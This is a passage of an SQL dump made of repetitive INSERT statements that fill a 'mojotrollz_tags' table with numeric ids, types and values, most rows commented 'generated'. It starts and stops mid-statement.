(`id`, `table`, `type`, `value`, `comment`) VALUES (48558, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (48559, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (48560, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (48561, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (48562, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (48563, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (48564, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (48565, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (48566, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (48567, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (48568, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (48569, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (48570, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (48571, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (48572, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (48573, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (48574, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (48575, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (48576, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (49485, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (49486, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (49487, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (50445, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (50446, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (50447, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (50448, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (50449, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (50450, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (50468, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (50469, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (50484, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (50485, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (50486, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (50487, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (50488, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (50489, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (50490, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (50491, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (50492, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (50493, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (50494, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (50495, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (50496, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (50497, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (50498, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (50499, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (50500, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (50501, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (50502, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (50503, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (50504, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (50505, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (50506, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (50507, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (50508, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (50509, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (50510, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (50511, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (50512, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (50513, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (50514, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (50515, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (50516, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (50517, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (50518, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (50519, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (50520, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (50521, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (50522, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (50523, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (50524, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (50525, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (50526, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (50527, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (50528, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (50529, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (50530, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (50531, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (50532, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (50533, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (50534, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (50535, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (50536, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (50537, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (50538, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (50547, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (50548, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (50549, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (50803, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (50804, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (50805, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (50830, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (50831, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (50910, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (50935, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (50936, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (50937, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (50961, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (50982, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (50983, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (50984, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (50985, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (50986, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (50987, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (50988, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (50989, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (51702, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (51703, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (51704, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (51705, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (51706, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (51707, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (51708, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (51948, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (51949, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (51950, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (52175, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (52176, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (55250, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (55535, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (55615, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (55616, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (55774, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (56809, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (56810, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (56818, 2, 1, 43, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (56818, 2, 2, 718, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (56819, 2, 1, 43, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (56819, 2, 2, 718, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (56820, 2, 1, 43, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (56820, 2, 2, 718, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (56821, 2, 1, 43, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (56821, 2, 2, 718, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (56897, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (56898, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (56901, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (56903, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (56905, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (56910, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (56911, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (57708, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (58369, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (58388, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (58389, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (58595, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (58596, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (58597, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (58598, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (58599, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (58600, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (58601, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (58602, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (58603, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (58604, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (58605, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (58606, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (58607, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (58608, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (58609, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (58610, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (58611, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (58612, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (58613, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (58614, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (58615, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (58616, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (58617, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (58618, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (58619, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (58620, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (58621, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (58622, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (58623, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (58624, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (58625, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (58626, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (58627, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (58629, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (59517, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (59518, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (59529, 2, 1, 43, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (59529, 2, 2, 718, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (59530, 2, 1, 43, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (59530, 2, 2, 718, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (59845, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (59846, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (59847, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (59848, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (59850, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (59851, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (59852, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (59853, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (59854, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (59855, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (59856, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (59857, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (59858, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (59859, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (59860, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (59861, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (59862, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (59863, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (59864, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (59865, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (59990, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (60393, 2, 1, 43, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (60393, 2, 2, 718, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (60394, 2, 1, 43, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (60394, 2, 2, 718, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (60395, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (60438, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (60439, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (60440, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (61035, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (61036, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (61037, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (61038, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (61039, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (61040, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (61041, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (61042, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (61043, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (61044, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (61045, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (61046, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (61047, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (61048, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (61049, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (61050, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (61051, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (61052, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (61053, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (61054, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (61055, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (61056, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (61057, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (61058, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (61059, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, 